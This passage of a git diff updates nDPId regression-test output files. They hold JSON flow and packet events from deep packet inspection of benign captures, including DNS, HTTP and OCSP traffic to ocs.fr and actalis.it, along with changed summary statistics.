+00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"www.ocs.fr","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842628,"flow_last_seen":1449652842628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652842628,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1449652842628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652842628,"pkt":"RQAAPD8ZQABABgMtwKi0ArL40NKmXgBQrzCnYwAAAACgAjkIgJAAAAIEBbQEAggKADWYegAAAAABAwMG"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1449652842700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652842700,"pkt":"RQAAND8aQABABgM0wKi0ArL40NKmXgBQrzCnZDkypeeAEADlhQYAAAEBCAoANZiCGkFpBQ=="} +00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1449652842701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":204,"pkt_l4_len":184,"thread_ts_msec":1449652842701,"pkt":"RQAAzD8bQABABgKbwKi0ArL40NKmXgBQrzCnZDkypeeAGADlkB4AAAEBCAoANZiCGkFpBUdFVCAvZGF0YV9wbGF0ZWZvcm1lL3Byb2dyYW0vMTg0OTYvdHZfZGV0YWlsX21vcnRkdW5wb3VydzAwMTIyMzZfNzJmNmMuanBnIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IHd3dy5vY3MuZnINCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652842628,"flow_last_seen":1449652842701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1449652842701,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} +00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":895,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1449652842628,"flow_last_seen":1449652843470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1449652843470,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1449652842628,"flow_last_seen":1449652846380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1449652786395,"flow_last_seen":1449652787578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652787596,"flow_last_seen":1449652818681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Azure","breed":"Acceptable","category":"Cloud"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652787596,"flow_last_seen":1449652818681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1449652784341,"flow_last_seen":1449652792355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1449652784341,"flow_last_seen":1449652792355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1449652786152,"flow_last_seen":1449652788767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1683,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652786167,"flow_last_seen":1449652786398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1449652788109,"flow_last_seen":1449652791955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5041,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1449652797357,"flow_last_seen":1449652797774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":751,"flow_first_seen":1449652787983,"flow_last_seen":1449652839371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652786135,"flow_last_seen":1449652787495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1449652787003,"flow_last_seen":1449652787811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":373,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1449652798305,"flow_last_seen":1449652798887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":946,"packets-processed":946,"total-skipped-flows":0,"total-l4-data-len":12361,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":18,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":108,"global_ts_msec":1449652846380} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 946/0 +~~ packets captured/processed: 946/946 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 0 -~~ total active/idle flows...: 0/0 +~~ total layer4 data length..: 12361 bytes +~~ total detected protocols..: 18 +~~ total active/idle flows...: 20/20 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5099937 bytes -~~ total memory freed........: 5099937 bytes -~~ total allocations/frees...: 113310/113310 +~~ total memory allocated....: 5155535 bytes +~~ total memory freed........: 5155535 bytes +~~ total allocations/frees...: 114329/114329 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 174 chars -~~ json string max len.......: 2208 chars -~~ json string avg len.......: 1191 chars +~~ json string min len.......: 449 chars +~~ json string max len.......: 1481 chars +~~ json string avg len.......: 965 chars diff --git a/test/results/ocsp.pcapng.out b/test/results/ocsp.pcapng.out index f81b5a9ba..e2d8ed631 100644 --- a/test/results/ocsp.pcapng.out +++ b/test/results/ocsp.pcapng.out @@ -1,69 +1,69 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ocsp.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1623221248283} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221248283,"flow_last_seen":1623221248283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221248283,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623221248283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623221248283,"pkt":"pJGxgjQ56CrqthSFCABFAAA07YhAAIAG7ObAqAHjbUbwgsKVAFBAnkIeAAAAAIAC+vAOKQAAAgQFtAEDAwgBAQQCGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARhcrEQ=="} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623221248292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":28,"thread_ts_msec":1623221248292,"pkt":"6CrqthSFpJGxgjQ5CABFAAAwAABAADUGJXRtRvCCwKgB4wBQwpWhnw3QQJ5CH3ASOQg1lwAAAgQFtAEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx3fu3"} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623221248311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":20,"thread_ts_msec":1623221248311,"pkt":"pJGxgjQ56CrqthSFCABFAAAo7YlAAIAG7PHAqAHjbUbwgsKVAFBAnkIfoZ8N0VAQAgGYawAAAAAAAAAAGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjLK1pA=="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221248283,"flow_last_seen":1623221248283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221248283,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623221248283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623221248283,"pkt":"pJGxgjQ56CrqthSFCABFAAA07YhAAIAG7ObAqAHjbUbwgsKVAFBAnkIeAAAAAIAC+vAOKQAAAgQFtAEDAwgBAQQCGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARhcrEQ=="} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623221248292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":28,"thread_ts_msec":1623221248292,"pkt":"6CrqthSFpJGxgjQ5CABFAAAwAABAADUGJXRtRvCCwKgB4wBQwpWhnw3QQJ5CH3ASOQg1lwAAAgQFtAEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx3fu3"} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623221248311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":20,"thread_ts_msec":1623221248311,"pkt":"pJGxgjQ56CrqthSFCABFAAAo7YlAAIAG7PHAqAHjbUbwgsKVAFBAnkIfoZ8N0VAQAgGYawAAAAAAAAAAGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjLK1pA=="} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}} 